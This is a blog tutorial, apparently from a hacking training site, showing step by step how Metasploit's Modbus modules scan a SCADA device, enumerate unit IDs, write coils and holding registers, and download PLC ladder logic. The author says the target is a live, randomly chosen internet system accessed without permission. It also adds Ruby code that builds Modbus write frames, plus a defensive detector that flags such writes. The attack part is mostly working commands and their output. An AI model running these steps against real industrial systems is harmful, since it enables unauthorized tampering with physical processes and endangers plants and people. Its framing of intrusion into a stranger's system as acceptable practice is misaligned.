OTW, Mar 7, 2019, 5 min read

Metasploit Basics, Part 16: Metasploit SCADA Hacking

Metasploit is widely recognized as a powerful tool for penetration testing and hacking of traditional IT systems, but few people realize that it also has capabilities in the more obscure, but increasingly important, SCADA/ICS sector. Information security for SCADA/ICS is the next great frontier in our industry! If you want to learn more about SCADA/ICS security and hacking, please see my section on SCADA Hacking.

SCADA/ICS systems use protocols that differ from those of traditional IT networks. Many were originally designed to run over serial media (RS-485) and were only later encapsulated in TCP/IP; Modbus/TCP, for example, wraps the original serial protocol and listens on TCP port 502. As a result, exploits in the SCADA/ICS world are of an entirely different nature, and the protocols themselves usually carry no authentication at all: anyone who can reach the port can issue commands.

Metasploit has a number of auxiliary and exploit modules for SCADA/ICS. For a complete list, see the article in the SCADA Hacking section.

In this tutorial, we will focus on the most widely used SCADA/ICS protocol, Modbus. Metasploit has a few modules specifically designed for reconnaissance and exploitation of this protocol.

I will be using a live, functioning SCADA system as my target. This is not a laboratory or VM. It is a random system selected from the Internet. I have removed its IP address to protect the naive and uninformed. No damage was done and all settings were returned to their original state.

Step #1: Search for Modbus Modules

To begin, let's use the search function in Metasploit to find Modbus modules.

msf > search modbus
Matching Modules
================

   Name                                          Disclosure Date  Rank    Description
   ----                                          ---------------  ----    -----------
   auxiliary/admin/scada/modicon_command         2012-04-05       normal  Schneider Modicon Remote START/STOP Command
   auxiliary/admin/scada/modicon_stux_transfer   2012-04-05       normal  Schneider Modicon Ladder Logic Upload/Download
   auxiliary/scanner/scada/modbus_findunitid     2012-10-28       normal  Modbus Unit ID and Station ID Enumerator
   auxiliary/scanner/scada/modbusclient                           normal  Modbus Client Utility
   auxiliary/scanner/scada/modbusdetect          2011-11-01       normal  Modbus Version Scanner

As you can see above, we found five (5) modules, all categorized as auxiliary. Sometimes these auxiliary modules in Metasploit actually have exploitation capabilities, as we will see here.

Let's load a module with a single reconnaissance capability, modbusdetect. As its name implies, it detects whether a host is speaking the Modbus protocol. This is the first step of reconnaissance and, eventually, exploitation.

msf > use auxiliary/scanner/scada/modbusdetect

This module only needs the user to set the IP address of the target as RHOSTS. The default port for Modbus is 502, so RPORT is set to 502 by default.

msf auxiliary(modbusdetect) > show options

Module options (auxiliary/scanner/scada/modbusdetect):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    502              yes       The target port
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  10               yes       Timeout for the network probe
   UNIT_ID  1                yes       ModBus Unit Identifier, 1..255, most often 1

msf auxiliary(modbusdetect) > set RHOSTS <target IP>
RHOSTS => <target IP>
msf auxiliary(modbusdetect) > exploit

[+] 502 - MODBUS - received correct MODBUS/TCP header (unit-ID: 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

When we run this module, it connects to the target's port 502 and sends a Modbus/TCP probe; a reply with a well-formed Modbus/TCP (MBAP) header is taken as confirmation that the host speaks Modbus. It is worth remembering that even a Modbus exception response carries a well-formed MBAP header, so a device does not have to accept the probe's request to reveal that it speaks Modbus.
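To make the framing concrete, here is what the probe above, and the unit-ID sweep and the coil/register reads and writes of the later steps, look like on the wire. The Ruby below (the language Metasploit's own modules are written in) is an added example and is not code from the original post or from Metasploit. Every frame is a 7-byte MBAP header followed by a PDU; the ToyPlc class is a constructed stand-in for a device so the example runs offline, and all function and variable names are my own.

```ruby
# Added example, not code from the original post or from Metasploit: a minimal
# Modbus/TCP codec showing what the modules in this tutorial put on the wire.
# Every frame is a 7-byte MBAP header (transaction id, protocol id = 0, length,
# unit id) followed by a PDU (function code + data), all fields big-endian.

# Build one frame; the length field counts the unit id byte plus the PDU.
def modbus_frame(tid, unit_id, pdu)
  [tid, 0, pdu.bytesize + 1, unit_id].pack("nnnC") + pdu
end

# FC 3: read `count` holding registers starting at protocol address `addr`.
def read_holding_registers(tid, unit_id, addr, count)
  modbus_frame(tid, unit_id, [3, addr, count].pack("Cnn"))
end

# FC 5: write one coil. Modbus encodes ON as 0xFF00 and OFF as 0x0000.
def write_single_coil(tid, unit_id, addr, on)
  modbus_frame(tid, unit_id, [5, addr, on ? 0xFF00 : 0x0000].pack("Cnn"))
end

# FC 16: write `values` (16-bit words) to consecutive registers from `addr`.
def write_multiple_registers(tid, unit_id, addr, values)
  pdu = [16, addr, values.size, values.size * 2].pack("CnnC") + values.pack("n*")
  modbus_frame(tid, unit_id, pdu)
end

# Validate the MBAP header (echoed transaction id, protocol id 0, consistent
# length) and split off the PDU. An exception reply (bit 7 of the function
# code set) is still a well-formed Modbus response and is reported as such.
def parse_response(frame, expected_tid)
  raise "short frame" if frame.bytesize < 8
  tid, proto, len, unit_id = frame.unpack("nnnC")
  raise "protocol id must be 0" unless proto.zero?
  raise "length mismatch" unless len == frame.bytesize - 6
  raise "transaction id mismatch" unless tid == expected_tid
  fc = frame.getbyte(7)
  if (fc & 0x80) != 0
    return { unit_id: unit_id, function: fc & 0x7F, exception: frame.getbyte(8) }
  end
  { unit_id: unit_id, function: fc, data: frame.byteslice(8, frame.bytesize - 8) }
end

# Decode the payload of an FC 3 response (byte count, then 16-bit words).
def registers_from_response(resp)
  resp[:data].byteslice(1, resp[:data].getbyte(0)).unpack("n*")
end

# Constructed stand-in for a PLC so the example runs offline. Like many real
# gateways it ignores the unit id and answers for any unit: a unit-id sweep
# against it reports every id as live although there is only one device.
class ToyPlc
  attr_reader :registers, :coils
  def initialize
    @registers = Array.new(100, 0)
    @coils = Array.new(100, false)
  end

  def handle(frame)
    tid, _proto, _len, unit_id = frame.unpack("nnnC")
    fc = frame.getbyte(7)
    pdu = frame.byteslice(8, frame.bytesize - 8)
    reply = case fc
            when 3
              addr, count = pdu.unpack("nn")
              [3, count * 2].pack("CC") + @registers[addr, count].pack("n*")
            when 5
              addr, val = pdu.unpack("nn")
              @coils[addr] = (val == 0xFF00)
              [5, addr, val].pack("Cnn")            # FC 5 reply echoes the request
            when 16
              addr, count, _bc = pdu.unpack("nnC")
              @registers[addr, count] = pdu.byteslice(5, count * 2).unpack("n*")
              [16, addr, count].pack("Cnn")
            else
              [fc | 0x80, 0x01].pack("CC")          # exception 01: illegal function
            end
    modbus_frame(tid, unit_id, reply)
  end
end

# Replay the tutorial's steps against the toy device and return the results.
def demo
  plc = ToyPlc.new
  # Step 2 caveat: unit ids 1..5 all answer, because the device ignores the field.
  answering = (1..5).select do |u|
    parse_response(plc.handle(read_holding_registers(1, u, 0, 1)), 1)[:unit_id] == u
  end
  # Step 3: coil 1 on, 27 into registers 1..5, then read registers 0..7 back.
  parse_response(plc.handle(write_single_coil(2, 1, 1, true)), 2)
  parse_response(plc.handle(write_multiple_registers(3, 1, 1, [27] * 5)), 3)
  regs = registers_from_response(parse_response(plc.handle(read_holding_registers(4, 1, 0, 8)), 4))
  # An unsupported function code (0x2B) comes back as an exception response.
  exc = parse_response(plc.handle(modbus_frame(5, 1, [0x2B].pack("C"))), 5)
  { answering: answering, coil1: plc.coils[1], regs: regs, exception: exc[:exception] }
end

puts demo.inspect if __FILE__ == $0
```

Two things to notice when comparing this with the module output on this page: the transaction ID is the only thing that ties a reply to a request (there is no session and no authentication), and a write request to coil address 1 followed by a read of the same address is the whole integrity check the protocol offers.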
As you can see above, it confirms that our target is running Modbus, and now we can proceed with Modbus-based reconnaissance and exploitation.

Step #2: Find Unit IDs

Now that we have confirmed that the target is actually running the Modbus protocol, the next step is to enumerate the Unit IDs of the connected devices. This is similar to a ping sweep in TCP/IP, but the results are somewhat less reliable. The Modbus unit identifier is a single byte; this module probes values 1 through 254. To manipulate or communicate with any Modbus device, we must have its Unit ID, not unlike needing an IP address in TCP/IP.

msf auxiliary(modbusdetect) > use auxiliary/scanner/scada/modbus_findunitid
msf auxiliary(modbus_findunitid) > show options

Module options (auxiliary/scanner/scada/modbus_findunitid):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BENICE        1                yes       Seconds to sleep between StationID-probes, just for being nice
   RHOST                          yes       The target address
   RPORT         502              yes       The target port
   TIMEOUT       2                yes       Timeout for the network probe, 0 means no timeout
   UNIT_ID_FROM  1                yes       ModBus Unit Identifier scan from value [1..254]
   UNIT_ID_TO    254              yes       ModBus Unit Identifier scan to value [UNIT_ID_FROM..254]

Once again, for this module the only variable we need to set is RHOST.
msf auxiliary(modbus_findunitid) > set RHOST <target IP>
RHOST => <target IP>
msf auxiliary(modbus_findunitid) > exploit

[+] 502 - Received: correct MODBUS/TCP from stationID 1
[+] 502 - Received: correct MODBUS/TCP from stationID 2
[+] 502 - Received: correct MODBUS/TCP from stationID 3
[+] 502 - Received: correct MODBUS/TCP from stationID 4
[+] 502 - Received: correct MODBUS/TCP from stationID 5
[+] 502 - Received: correct MODBUS/TCP from stationID 6
[+] 502 - Received: correct MODBUS/TCP from stationID 7
[+] 502 - Received: correct MODBUS/TCP from stationID 8
[+] 502 - Received: correct MODBUS/TCP from stationID 9
[+] 502 - Received: correct MODBUS/TCP from stationID 10
[+] 502 - Received: correct MODBUS/TCP from stationID 11
[+] 502 - Received: correct MODBUS/TCP from stationID 12
[+] 502 - Received: correct MODBUS/TCP from stationID 13
[+] 502 - Received: correct MODBUS/TCP from stationID 14
[+] 502 - Received: correct MODBUS/TCP from stationID 15
[+] 502 - Received: correct MODBUS/TCP from stationID 16
[+] 502 - Received: correct MODBUS/TCP from stationID 17
[+] 502 - Received: correct MODBUS/TCP from stationID 18

As you can see, this module reported a response from every Unit ID it probed. One caveat: a Modbus/TCP gateway or PLC that ignores the unit identifier field will answer for every Unit ID, so an unbroken run of "live" station IDs like this one may be a single device rather than eighteen. Either way, these Unit IDs are what we need for reading and writing their data, as we will see next.

Step #3: Reading and Writing the Modbus Devices

Our next Modbus module is modbusclient. It enables us to read and write the data in both the coils and the registers of these SCADA systems. Reading the data can lead to information leakage, but writing the data is even more nefarious, as it could change settings within the plant and cause a malfunction (pay attention, cyber warriors!).

Let's load this module.
msf auxiliary(modbus_findunitid) > use auxiliary/scanner/scada/modbusclient
msf auxiliary(modbusclient) > show options

Module options (auxiliary/scanner/scada/modbusclient):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   DATA                             no        Data to write (WRITE_COIL and WRITE_REGISTER modes only)
   DATA_ADDRESS                     yes       Modbus data address
   DATA_COILS                       no        Data in binary to write (WRITE_COILS mode only) e.g. 0110
   DATA_REGISTERS                   no        Words to write to each register separated with a comma (WRITE_REGISTERS mode only) e.g. 1,2,3,4
   NUMBER          1                no        Number of coils/registers to read (READ_COILS and READ_REGISTERS modes only)
   RHOST                            yes       The target address
   RPORT           502              yes       The target port
   UNIT_NUMBER     1                no        Modbus unit number

Auxiliary action:

   Name            Description
   ----            -----------
   READ_REGISTERS  Read words from several registers

This module requires several variables to be set. Most important is the ACTION, which selects the Modbus operation. The option descriptions above show the available modes:

1. READ_COILS
2. WRITE_COIL (one coil, value in DATA)
3. WRITE_COILS (several coils, bit string in DATA_COILS)
4. READ_REGISTERS
5. WRITE_REGISTER (one register, value in DATA)
6. WRITE_REGISTERS (several registers, comma-separated words in DATA_REGISTERS)

Two other options are easy to confuse. UNIT_NUMBER (default 1) selects which Unit ID the request is addressed to; it is the value we enumerated in Step #2. NUMBER (default 1) is how many consecutive coils or registers to read, starting at DATA_ADDRESS, which must always be set. DATA_ADDRESS is the raw protocol address sent on the wire, so it is zero-based; vendor documentation that numbers holding registers from 40001 is offset from it by one. In this case, I set the NUMBER variable to 100; with DATA_ADDRESS at 1, as the output below shows, the module reads 100 registers starting at address 1 from Unit ID 1.

msf auxiliary(modbusclient) > set RHOST <target IP>
RHOST => <target IP>
msf auxiliary(modbusclient) > set DATA_ADDRESS 1
DATA_ADDRESS => 1
msf auxiliary(modbusclient) > set NUMBER 100
NUMBER => 100
msf auxiliary(modbusclient) > exploit

[*] 502 - Sending READ REGISTERS...
[+] 502 - 100 register values from address 1
[+] 502 - [0, 0, 0, 0, 0, 0, 69, 0, 39, 0, 0, 90, 0, ...]   (100 values, mostly 0, with a handful of non-zero words in between)
[*] Auxiliary module execution completed

As you can see in the output above, we were able to read the values of 100 registers.

Next, let's try writing to the coils. In Modbus terminology, coils are single-bit outputs: each is either ON (1) or OFF (0), and on a real device a coil usually maps to a discrete output such as a relay, motor starter or solenoid valve. By changing the value of a coil, you are switching that output on or off.

First, we need to change the ACTION to WRITE_COIL.

msf auxiliary(modbusclient) > set ACTION WRITE_COIL
ACTION => WRITE_COIL
msf auxiliary(modbusclient) > show options

Module options (auxiliary/scanner/scada/modbusclient):
(options unchanged from above)

Auxiliary action:

   Name        Description
   ----        -----------
   WRITE_COIL  Write one bit to a coil

Next, set DATA to 1 (only 1 or 0 are valid values). The coil written is the one at DATA_ADDRESS, still 1 here.

msf auxiliary(modbusclient) > set DATA 1
DATA => 1
msf auxiliary(modbusclient) > exploit

[*] 502 - Sending WRITE COIL...
[+] 502 - Value 1 successfully written at coil address 1
[*] Auxiliary module execution completed

As you can see above, we successfully changed the value of the coil to 1! To check whether the value actually changed, we can now go back and read the coils.

msf auxiliary(modbusclient) > set ACTION READ_COILS
ACTION => READ_COILS
msf auxiliary(modbusclient) > exploit

[*] 502 - Sending READ COILS...
[+] 502 - 100 coil values from address 1
[+] 502 - [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, ...]   (100 values; all 0 except the first)
[*] Auxiliary module execution completed

The value of the first coil was successfully set to 1 while all the others are still 0.

Now, let's try to change the values in the registers. Holding registers are 16-bit words that hold the values a device uses for its process, such as how long to run a pump or at what pressure a valve should open. Changing these values could have dire repercussions.

Let's first write values to the registers. Because we are writing several registers at once, the ACTION is WRITE_REGISTERS and the values go in DATA_REGISTERS (not DATA, which is only used by the single-value WRITE_COIL and WRITE_REGISTER actions), separated by commas. In this case, let's write 27 to each of the first five registers starting at address 1.

msf auxiliary(modbusclient) > set ACTION WRITE_REGISTERS
ACTION => WRITE_REGISTERS
msf auxiliary(modbusclient) > set DATA_REGISTERS 27,27,27,27,27
DATA_REGISTERS => 27,27,27,27,27
msf auxiliary(modbusclient) > exploit

[*] 502 - Sending WRITE REGISTERS...
[+] 502 - Values 27,27,27,27,27 successfully written from registry address 1
[*] Auxiliary module execution completed

After we hit exploit, Metasploit reports that 5 values have been written. To check whether the values have actually changed, we change the ACTION back to READ_REGISTERS.

msf auxiliary(modbusclient) > set ACTION READ_REGISTERS
ACTION => READ_REGISTERS
msf auxiliary(modbusclient) > exploit

[*] 502 - Sending READ REGISTERS...
[+] 502 - 100 register values from address 1
[+] 502 - [27, 27, 27, 27, 27, ...]   (100 values; the remainder as in the earlier read)
[*] Auxiliary module execution completed

As you can see, the first 5 register values have been changed to 27. This could be very dangerous!

Step #4: Download the PLC Ladder Logic

Within a SCADA/ICS network, PLCs are the brains behind the actions taking place. These small computers are programmed to control the devices connected to them. The control program is commonly written in "ladder logic" (one of the IEC 61131-3 PLC programming languages). An attacker would likely want to download and analyze the PLC's ladder logic to learn what the PLC is controlling and how. By understanding the logic, values can then be changed that might have a devastating impact on the facility. No one but the engineers responsible for the PLC should be able to view this logic. Unfortunately, some administrators don't protect their ladder logic and make it available to anyone who tries to download it. It's worth noting that the famous Stuxnet malware did this before uploading new, destructive logic to the PLCs controlling the Iranian uranium enrichment centrifuges.

Let's try to do this at our target facility. The first step is to load the proper module.

msf auxiliary(modbusclient) > use auxiliary/admin/scada/modicon_stux_transfer

Note that, as its description says, this module is specific to Schneider Electric Modicon PLCs: it performs the transfer with a Schneider vendor-specific Modbus function code rather than with standard Modbus reads and writes, so against a Modbus device from another vendor it will fail rather than return a program. We only need to set our MODE variable to receive (RECV) and our RHOST to that of our target.
msf auxiliary(modicon_stux_transfer) > show options

Module options (auxiliary/admin/scada/modicon_stux_transfer):

   Name      Current Setting                                                   Required  Description
   ----      ---------------                                                   --------  -----------
   FILENAME  /usr/share/metasploit-framework/data/exploits/modicon_ladder.apx  yes       The file to send or receive
   MODE      SEND                                                              yes       File transfer operation (Accepted: SEND, RECV)
   RHOST                                                                       yes       The target address
   RPORT     502                                                               yes       The target port

msf auxiliary(modicon_stux_transfer) > set MODE RECV
MODE => RECV
msf auxiliary(modicon_stux_transfer) > set RHOST <target IP>
RHOST => <target IP>
msf auxiliary(modicon_stux_transfer) > exploit

[*] 502 - MODBUS - Sending read request
[*] 502 - MODBUS - Retrieving file

When we enter exploit, if the ladder logic is unprotected, the module begins to download the program, as it did here. FILENAME is both the file sent in SEND mode and the destination written in RECV mode, so point it at a path of your own before retrieving rather than overwriting the sample ladder file shipped with Metasploit.

Conclusion

Many industrial systems can be accessed and manipulated through a few simple Modbus modules in Metasploit, and Modbus itself offers no authentication to stop them: a host that can reach port 502 can read and write coils and registers at will. This manipulation of coils and registers has the potential for disastrous consequences in the wrong hands. It is time for the SCADA/ICS industry to take security seriously before such dire circumstances take place!
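The defensive counterpart to what this tutorial demonstrates is to watch for exactly these requests on the plant network. The Ruby below is an added example, not code from the original post or from Metasploit: a detection pass over Modbus/TCP requests that flags any write function code (the modbusclient WRITE_* actions) coming from a host outside an assumed engineering-workstation allowlist, and any use of the Schneider vendor-specific function code 90 that modicon_stux_transfer relies on for program transfer. The captured traffic, the IP addresses and the allowlist are constructed; the payload bytes after function code 90 are made up, since the detection keys only on the function code.

```ruby
# Added example, not code from the original post: a detection pass over
# Modbus/TCP requests, the check a plant network monitor would run to notice
# the writes and program transfers performed in this tutorial. The traffic,
# addresses and allowlist below are constructed so that it runs offline.

# Function codes that change device state (modbusclient's WRITE_* actions).
WRITE_FUNCTIONS = {
  5  => "Write Single Coil",
  6  => "Write Single Register",
  15 => "Write Multiple Coils",
  16 => "Write Multiple Registers",
}.freeze

# Schneider's vendor-specific function code, used by modicon_stux_transfer
# to upload or download PLC programs.
SCHNEIDER_FC = 90

# Assumed engineering workstation: the only host allowed to write to PLCs.
ENGINEERING_HOSTS = ["10.10.1.5"].freeze

# Decode just what detection needs from a request; nil if it is not Modbus/TCP.
def decode_request(frame)
  return nil if frame.bytesize < 8
  tid, proto, len, unit_id = frame.unpack("nnnC")
  return nil unless proto.zero? && len == frame.bytesize - 6
  addr = frame.bytesize >= 10 ? frame.byteslice(8, 2).unpack1("n") : nil
  { tid: tid, unit_id: unit_id, function: frame.getbyte(7), address: addr }
end

# One alert string per suspicious request; reads are left alone.
def modbus_alerts(requests)
  requests.each_with_object([]) do |(src, raw), alerts|
    req = decode_request(raw)
    next if req.nil?
    fc = req[:function]
    if WRITE_FUNCTIONS.key?(fc) && !ENGINEERING_HOSTS.include?(src)
      alerts << "WRITE from #{src}: #{WRITE_FUNCTIONS[fc]} unit=#{req[:unit_id]} addr=#{req[:address]}"
    elsif fc == SCHNEIDER_FC
      alerts << "PLC program transfer (FC 90) from #{src} unit=#{req[:unit_id]}"
    elsif (fc & 0x80) != 0
      alerts << "malformed function code #{fc} from #{src}"   # exception bit set in a request
    end
  end
end

def build_frame(tid, unit, pdu)
  [tid, 0, pdu.bytesize + 1, unit].pack("nnnC") + pdu
end

# Constructed capture mirroring the tutorial: one legitimate writer, one intruder.
SAMPLE_REQUESTS = [
  ["10.10.1.5",   build_frame(1, 1, [3, 0, 10].pack("Cnn"))],                  # HMI-style read
  ["10.10.1.5",   build_frame(2, 1, [16, 100, 1, 2, 500].pack("CnnCn"))],      # engineering write
  ["203.0.113.9", build_frame(3, 1, [5, 1, 0xFF00].pack("Cnn"))],              # coil 1 forced ON
  ["203.0.113.9", build_frame(4, 1, [16, 1, 5, 10, 27, 27, 27, 27, 27].pack("CnnCn5"))],
  ["203.0.113.9", build_frame(5, 1, [90, 0, 1].pack("CCC"))],                  # FC 90, payload made up
  ["203.0.113.9", "not modbus at all"],
].freeze

puts modbus_alerts(SAMPLE_REQUESTS) if __FILE__ == $0
```

Run against the constructed capture, this raises three alerts: the coil write and the five-register write from the outside host, and the function code 90 transfer. The engineering workstation's own write is allowed through, which is the point of keying on source host as well as function code; Modbus has no notion of who is asking, so the network is the only place that distinction can be made.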
